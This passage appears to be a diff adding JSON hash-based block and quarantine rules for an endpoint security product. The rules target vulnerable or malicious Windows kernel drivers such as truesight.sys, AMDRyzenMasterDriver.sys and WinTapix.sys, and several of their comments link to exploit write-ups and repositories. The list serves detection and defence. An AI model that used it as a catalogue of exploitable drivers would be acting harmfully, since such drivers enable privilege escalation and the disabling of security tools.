"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812063Z", + "creation_date": "2026-03-23T11:45:31.812065Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812071Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "284287b99fc92f7700c23bfcb78eb61d3101bd0767989e973d03e42bb67a660a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1c63b841-f1bf-556a-9fb9-5c4612094386", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483784Z", + "creation_date": "2026-03-23T11:45:31.483788Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483798Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5d11c772a4b7ee2748f1da5ddab4960ae5751b4b4624399cda777af923ccfbbc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1c655c7c-67f9-5c50-b40f-5c47c5b12fa2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978650Z", + "creation_date": "2026-03-23T11:45:29.978652Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978658Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "911e01544557544de4ad59b374f1234513821c50a00c7afa62a8fcca07385b2f", + "comment": "Vulnerable Kernel Driver (aka magdrvamd64.sys) [https://www.loldrivers.io/drivers/cfd36b2e-cf96-498e-aeb6-ee20e7b33bbb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1c6f59b4-ac34-5c2a-895b-c15b51c12200", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826049Z", + "creation_date": "2026-03-23T11:45:30.826052Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826061Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c764301c3ff5279d06ffd3b6a3180c9da38c3ae49d7eff8601835dabc8a9db99", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1c7efbca-a654-5c16-b872-c587fd4317ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612793Z", + "creation_date": "2026-03-23T11:45:29.612795Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612800Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e5e4dc1a918e201ec2cf02a036e4dd03dd04dfd179091c8adfbc6745eb830f2f", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1c8af134-24cc-5972-97f1-717aea407f34", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810433Z", + "creation_date": "2026-03-23T11:45:31.810435Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810440Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": 
null, + "references": [], + "type": "hash", + "value": "2be2c63aa1b437982d5ccede27644702a7edd189e3c498051030c6a7ace15a0b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1c8ef31b-a90b-5290-8142-65f2c37577b7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821467Z", + "creation_date": "2026-03-23T11:45:31.821469Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821475Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1582c2e29c20e43e3640f2054de2d06afdcb89524bf467b78a4a0ae747ccb9e9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1c9cdade-2732-55f2-ade1-274c20eb316d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823695Z", + "creation_date": "2026-03-23T11:45:31.823697Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823703Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e9efab0c988bf7577596ad8ef753ab784a46c44455e7b9395e10622d3e9a80b3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1ca7ba84-f9f5-5e03-8177-b2b5174007c7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985720Z", + "creation_date": "2026-03-23T11:45:29.985722Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985728Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9ac6d632f61d9abe287616ade35f555cd8cf5b91adda382c5ced0cbae468b0e7", + "comment": 
"Malicious Kernel Driver related to WINTAPIX (aka WinTapix.sys and SRVNET2.SYS) [https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1cab13d6-3a8e-5c07-9db0-8ab8f167e094", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975148Z", + "creation_date": "2026-03-23T11:45:29.975150Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975156Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "af1011c76a22af7be97a0b3e0ce11aca0509820c59fa7c8eeaaa1b2c0225f75a", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1cc84bcf-b33f-5132-ab81-9c9a8d799815", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", 
+ "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831882Z", + "creation_date": "2026-03-23T11:45:30.831884Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831890Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8120ccba85fa029f3ad4a6498a573aa8ceb3bbde691a41da550ef87ba57f0d14", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1ccb5a5b-d54e-52e3-9a08-211f88fbd137", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816291Z", + "creation_date": "2026-03-23T11:45:31.816294Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816302Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1b36f5995cda260348a3c01015e681432e1e363b2c15a42a8cedc9cc26a143b1", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1cd329c7-49c1-5afb-b642-cc31e32e7701", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479277Z", + "creation_date": "2026-03-23T11:45:30.479280Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479285Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cfa28e2f624f927d4cbd2952306570d86901d2f24e3d07cc6277e98289d09783", + "comment": "Vulnerable Kernel Driver (aka VBoxTAP.sys) [https://www.loldrivers.io/drivers/f22e7230-5f32-4c4e-bc9d-9076ebf10baa/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1cdd33b6-22b1-5f32-be69-fad90ac6154b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487272Z", + 
"creation_date": "2026-03-23T11:45:31.487274Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487280Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "679ad546f6c631471cf2590db7f9fdde7b8df2d1883b673a1ab739f975238200", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1ce2e860-bc84-593c-8249-77835115f9ad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816508Z", + "creation_date": "2026-03-23T11:45:30.816510Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816516Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8e1f3b15e4e5003a563bf8742558f5dc48fd0fe20238efe759001bf226f234ff", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"1cfdb981-6005-57ec-9f8f-d85825095c4b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474741Z", + "creation_date": "2026-03-23T11:45:30.474744Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474753Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "158f9e2bcec73e821d5df17c1d5f9f46f23ecd9f6cf101588578235240f5cca0", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d087936-25d8-5891-8488-7bde0a489e4e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823502Z", + "creation_date": "2026-03-23T11:45:30.823504Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823509Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6f36a82220bf47ed3a0fe4d33db7c9f22f1e9906930dad1609f15c8c74c1d402", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d108049-dedb-591e-be69-72fbaccf90ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475895Z", + "creation_date": "2026-03-23T11:45:30.475899Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475907Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c190e4a7f1781ec9fa8c17506b4745a1369dcdf174ce07f85de1a66cf4b5ed8a", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d1443ce-3788-5263-8bf5-0ec1e04a2f66", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481414Z", + "creation_date": "2026-03-23T11:45:30.481417Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481425Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ec7af309a9359c332d300861655faeceb68bb1cd836dd66d10dd4fac9c01a28", + "comment": "Vulnerable Kernel Driver (aka phymem_ext64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d216cbb-342c-5b21-b9c5-b9f645a5a64f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833910Z", + "creation_date": "2026-03-23T11:45:30.833913Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833922Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "563684a67bba92fc286df805f6a1e8084ba49517ff904544885b06f149ea13ce", + "comment": "Vulnerable Adlice 
Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d231e1e-8909-5deb-82f0-05d99f7e20a9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142772Z", + "creation_date": "2026-03-23T11:45:31.142774Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142780Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b29023164d31da561b5c91c75f22377b9f0b8ded0b4b8b049a77e06b6a1ec24", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d26770e-b3fd-576e-b143-a2766abce929", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458635Z", + "creation_date": "2026-03-23T11:45:30.458639Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458648Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cf2ea0e4d21d3774bbacf10a14c75583b448829f87a90b869678fbc4de9b2a99", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d3c2aff-ebf2-5472-bb52-97174bc86c15", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976192Z", + "creation_date": "2026-03-23T11:45:29.976194Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976199Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) 
[https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d3d62e1-49f9-57b4-add9-46f50b745586", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459709Z", + "creation_date": "2026-03-23T11:45:30.459712Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459721Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "554bf34bde5e7c86fc463496d19a4369d911ccad90e3c684855192cd677641c4", + "comment": "Vulnerable Kernel Driver (aka viragt.sys) [https://www.loldrivers.io/drivers/39742f99-2180-46d7-8538-56667c935cc3/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d446710-8318-5ef1-acfe-6fb7e8565124", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821316Z", + "creation_date": "2026-03-23T11:45:31.821320Z", + "enabled": true, + 
